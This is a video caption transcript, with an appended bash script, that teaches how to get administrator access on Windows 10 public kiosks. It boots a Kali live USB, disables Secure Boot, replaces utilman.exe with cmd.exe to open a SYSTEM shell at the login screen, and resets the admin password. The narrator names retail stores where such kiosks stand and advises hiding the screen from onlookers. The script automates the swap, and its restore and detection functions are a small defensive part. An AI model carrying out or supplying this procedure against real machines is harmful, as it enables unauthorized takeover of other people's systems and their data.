Hacking Admin Access on Windows 10

Video Statistics and Information

Captions
Hey everybody, this is the first video of a new series that I'm calling Kiosk Hacking. This was a game that we used to play at my old job, where our security developers would build these locked-down systems that were intended to be used as kiosks out in the public, and we would compete to see if we could actually find any security holes in their designs to gain access to the underlying system, or the network that it's on, or even further than that. So this first one is actually kind of a revival of an old trick that I used to do on Windows 7, and I'm going to try to bring it to Windows 10 this time. The only real requirement is you do have to have physical access to the actual controls of the computer itself, so I'm talking about the power button and USB ports. Now I know that's not the most usual thing that you're going to come across these days; usually those are in locked boxes that are attached to the kiosk itself. But I have still seen these full-computer kiosks fairly recently that are just these touch-screen monitors that have a computer or a laptop bolted to the back of it, like a Dell OptiPlex or some thin client or something like that. If you just look behind them or look underneath them, you'll see that it's just a full computer that you can do whatever you want with. I've seen them in Walmart, I've seen them in Sears, I've seen them in Kohl's department store, I've seen them in IKEA, and these are really just things that you're supposed to walk up to with a product; maybe there's a barcode scanner and you can scan an item, and it'll tell you how many they have or what aisle it's on and stuff like that. But the reason I'm starting with this trick is because it's something that most people would never really think of. This is an unobtrusive hack that is persistent, so you can leave and come back and it will still work, and it's just never expected by anybody, so I think it's kind of fun. Before we get started I just wanted to show you real quick what I'm actually exploiting in this trick.

So if you look here, this is just a regular Windows 10 login screen. There's really nothing that I can do here without a password. Sometimes in the bottom left corner there are some power buttons to shut down or restart the computer; you can see what network you're connected to, but you can't make any changes, you can't right-click or anything. But there is this Ease of Access button in the bottom right-hand corner, which is also accessible if you hold down the Windows key and hit the letter U, to make your computer easier to use, and you'll see this little screen pop up in the top left-hand corner with a digital narrator who's explaining some changes that you can make to the login screen to make things easier for someone who's hearing- or sight-impaired. This is actually an executable that lives in System32; it's called utilman.exe, Utility Manager. So this is the executable that we are going to be exploiting in this trick.

OK, and for the sake of simplicity I'm going to use this Lenovo laptop as my example kiosk. Obviously a physical computer is a physical computer; if you have access to the power button and the USB ports, everything is going to be pretty much exactly the same. The only other thing I do have here is a flash drive with a live distribution of Linux, so this can be basically any distro that can run live. I think I used to use DSL, which stands for Damn Small Linux. Anything that can boot really quickly and doesn't stay up on the screen too long, like waiting for menus and stuff to load, is fine for this. I actually installed the newest version of Kali on this flash drive, so that's what we're going to use for this example. So the only thing I've done to this computer so far is held the power button down to shut it down, and then gone ahead and plugged in my flash drive and powered back on. So obviously at this point you can tell that we're going to boot to the USB drive; I need to hit F12 to get into it. But let's say, for example, you try to get into the boot menu and you can't. I'm going to go into F1 for the BIOS and I'm going to show you an example of why you may not be able to boot into this drive.

So probably I would go ahead and quickly get into the boot menu and try to boot from the flash drive first, but if it doesn't work you need to quickly get into the BIOS and run over to Security, and then you'll scroll down to Secure Boot and you need to make sure that Secure Boot is disabled. Then you need to go over to the Startup tab and look for legacy boot, and make sure that UEFI and legacy boot are both supported. Once that's done, you're sure that you can actually get into the computer, and you can just go ahead and get out of the BIOS. So the keys you need to hit are going to be dependent on the manufacturer of the computer; for Lenovo it's F12. I'm going to go ahead and jump down to my USB device as my boot drive. For Kali I'm going to do a live system boot. I did used to use BackTrack for this, which was a little bit nicer than Kali because instead of booting to a full graphical user interface it would just boot straight to a terminal, which is quite a bit faster and it looks a little bit less conspicuous, because even though it is just a bunch of code up on the screen, it can get to it faster and let you do your work without people seeing that you're running a separate operating system on it. So for this stuff, what I would probably do is turn my back and kind of cover the monitor as much as you can so that no one can see what you're doing, and as soon as you get to the prompt go ahead and very quickly log in and get to a terminal.

Then once you get booted into Kali you'll see on the desktop a folder called Windows, and this actually is the Windows partition on the hard drive of the computer itself. So we could go ahead and start grabbing these folders and copying them to the flash drive or off to an FTP server or something, but my little trick I want to do a little bit differently. So I see here that Kali has already mounted the Windows partition to /media/root/Windows, so I'm going to go ahead and open up a terminal here and I'm going to cd to /media/root/Windows, and then inside of that I want to go to the Windows folder and System32. Then obviously if I do an ls in here I can see all the files in System32; the only one I care about is that utilman.exe executable file. So what I'm going to do here is I'm going to say move utilman.exe to utilman.old, and all that's doing is just renaming it from utilman.exe to utilman.old. Then I'm going to take the CMD, the command prompt executable, and I'm going to copy that from cmd.exe to the new utilman.exe. So what I've done here is I've overridden the old utilman.exe with the command prompt, but I've backed up the old utilman as utilman.old. So obviously the executable is still there, but once we restart the computer, any time anyone tries to call the utilman executable it's going to run the command prompt instead. I think you're probably seeing where this is going, but let's go ahead and restart.

Now I can just grab my flash drive, unplug it, turn the computer back on and walk away. Once the computer boots back up, if we hit the spacebar and get to the login screen, just like we did in the beginning when we held down the Windows key and hit the letter U, let's try that again. This time we get a command prompt, which is awesome, and you'll see up at the top here it's actually running the command prompt as utilman.exe, obviously because that's what we renamed it to be. So the first thing I always do whenever I get into a command prompt is I see who is running this, what permissions do I have. So if I do a whoami you'll see this is currently running as the SYSTEM user, so I can go ahead and I can dig in and I can see everything. OK, a fresh command prompt; let's do a dir, there's everything. I can cd into Users, there are all my users, I can get into the admin folder, I can see all their files. But I want to do something a little bit more interesting than this. Let's see what happens if I run explorer. Look at that, I have a taskbar. Obviously this is the SYSTEM user, so I can't do a whole lot: I can't actually open the Start button, I can't really do much, I can't control any open programs running in the background, I can't change the time, I can't connect to a different Wi-Fi. However, I can right-click and open the Task Manager, so I can go ahead and come in here and I can run a new task. But what I want to do is I want to mess with this admin account; I want to see if I can actually get into this account. So what I'm going to do is I'm going to run net user and admin, and I'm going to change the password to something else. Let's set this. OK, there. So now let's go back to the login screen, and now I can log in with the admin account with my new password. So now I have full administrative access to this computer; I can do anything I want, I can copy all the files off, I can destroy it if I really, really wanted to. Anyway, that's it. So yeah, one little teeny-tiny trick, renaming an executable that's accessible from the login screen, allows you to change the administrative password to the computer and get access to everything. So that was trick number one; we'll see you in trick number two.
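The steps the video types into the Kali terminal (rename utilman.exe, copy cmd.exe over it) and the two things a practitioner wants next, undoing the change and checking an offline disk for it, as an added bash script. This is not the video's own code. It assumes the Windows partition is mounted read-write at a path passed on the command line (the video's Kali mount was /media/root/Windows; that path is only a placeholder here) and that the directory on disk is spelled Windows/System32, because the NTFS driver on Linux normally matches case exactly. Two caveats the video does not cover: a BitLocker-protected volume cannot be mounted from a live USB without the recovery key, so the swap is impossible there, and on a running machine `sfc /scannow` will notice that utilman.exe no longer matches the component store and put the genuine file back.

```bash
#!/usr/bin/env bash
# Added example, not code from the video: swap utilman.exe for cmd.exe on an
# offline Windows partition, undo the swap, and check a disk for an existing swap.
# The mount point is an argument; /media/root/Windows from the video is only a
# placeholder. Assumes the partition is mounted read-write (ntfs-3g).
set -u

# NTFS on Linux is usually case-sensitive: this must match the case on disk.
SYS32_REL="Windows/System32"

# Print the System32 directory under a mount point, or fail if it is not there.
sys32_dir() {
  local mnt="$1" d="$1/$SYS32_REL"
  [ -d "$d" ] || { echo "no $SYS32_REL under $mnt (wrong mount point or path case?)" >&2; return 1; }
  printf '%s\n' "$d"
}

# Rename utilman.exe to utilman.old and drop a copy of cmd.exe in its place.
# Refuses to run twice so the backup is never overwritten by the cmd.exe copy.
swap_utilman() {
  local d
  d=$(sys32_dir "$1") || return 1
  if [ -e "$d/utilman.old" ]; then
    echo "utilman.old already exists; refusing to overwrite the backup" >&2
    return 1
  fi
  mv "$d/utilman.exe" "$d/utilman.old" && cp "$d/cmd.exe" "$d/utilman.exe"
}

# Put the original utilman.exe back from the backup and remove the backup.
restore_utilman() {
  local d
  d=$(sys32_dir "$1") || return 1
  if [ ! -e "$d/utilman.old" ]; then
    echo "no utilman.old backup to restore" >&2
    return 1
  fi
  mv -f "$d/utilman.old" "$d/utilman.exe"
}

# Forensic check from the same live USB: a genuine utilman.exe is never
# byte-identical to cmd.exe. Exit 0 = swapped, 1 = files differ, 2 = cannot check.
utilman_swapped() {
  local d
  d=$(sys32_dir "$1") || return 2
  [ -f "$d/utilman.exe" ] && [ -f "$d/cmd.exe" ] || return 2
  cmp -s "$d/utilman.exe" "$d/cmd.exe"
}

# Command-line use: utilman.sh {swap|restore|check} <mountpoint>
case "${1:-}" in
  swap)    swap_utilman "${2:?mount point required}" ;;
  restore) restore_utilman "${2:?mount point required}" ;;
  check)
    rc=0
    utilman_swapped "${2:?mount point required}" || rc=$?
    case $rc in
      0) echo "SWAPPED: utilman.exe is byte-identical to cmd.exe" ;;
      1) echo "utilman.exe and cmd.exe differ" ;;
      *) echo "could not check" >&2 ;;
    esac ;;
  "")      : ;;   # no arguments: only define the functions (when sourced)
  *)       echo "usage: $0 {swap|restore|check} <mountpoint>" >&2 ;;
esac
```

Run it as `bash utilman.sh swap /media/root/Windows` from the live system, reboot, and the Windows-key-plus-U shortcut at the login screen opens cmd.exe as SYSTEM exactly as in the video; `bash utilman.sh check /media/root/Windows` is the same comparison an incident responder would run against a kiosk image to tell whether someone has already done this. The check compares utilman.exe only against cmd.exe, which is what the video swaps in; an attacker can copy any other binary over it, so a full verification should compare the file against a known-good hash or let `sfc` do it.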
Info
Channel: Ryan MacNeille
Views: 67,553
Keywords: WIndows 10, hacking, hack, utilman, sticky keys, login, admin, administrative, access, kiosk, fast, kali, usb, boot, exploit
Id: CAZLU6rnIlQ
Length: 9min 44sec (584 seconds)
Published: Thu Apr 25 2019